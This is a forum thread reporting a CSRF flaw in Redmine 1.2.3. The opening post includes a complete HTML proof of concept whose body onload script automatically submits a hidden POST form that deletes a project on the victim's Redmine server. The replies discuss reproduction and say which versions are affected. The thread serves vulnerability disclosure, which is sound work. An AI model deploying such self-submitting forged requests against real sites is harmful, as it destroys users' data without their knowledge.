Redmine is still vulnerable against CSRF

Added by Peter Panther about 7 years ago

It seems that Redmine is still vulnerable against CSRF.

Scenario:
- user is logged in at the redmine server
- user follows a link that executes the following HTML Code
- the project "deleteme" will be deleted automatically and the user will be logged out.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>CRSF Demonstration</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
     document.forms[0].submit();
}

</script>
<H2>CRSF Demonstration</H2>
<form method="POST" name="form0" action="https://<server>/redmine/projects/deleteme">
<input type="hidden" name="_method" value="delete"/>
<input type="hidden" name="confirm" value="1"/>
<input type="hidden" name="commit" value="Delete"/>
</form>
</body>
</html>

I thought that this problem was fixed with rails 2.3.11 and CVE-2011-0447?

I'm using
  • Rails 2.3.11
  • Redmine 1.2.3.stable.8195 (MySQL)

Any ideas?

Replies (2)

RE: Redmine is still vulnerable against CSRF - Added by Jan from Planio www.plan.io about 7 years ago

Thanks for reporting this. However, we were unable to reproduce this with:

  • Redmine 1.2.3.stable.8195 (MySQL)
  • both Rails 2.3.11 and Rails 2.3.14

If you believe we missed something, please get in touch via and we'll discuss it off the record until we can determine if it's an actual vulnerability and commit a fix.

Thanks!

RE: Redmine is still vulnerable against CSRF - Added by Jean-Philippe Lang about 7 years ago

This issue affects Redmine < 1.3.0 only.

(1-2/2)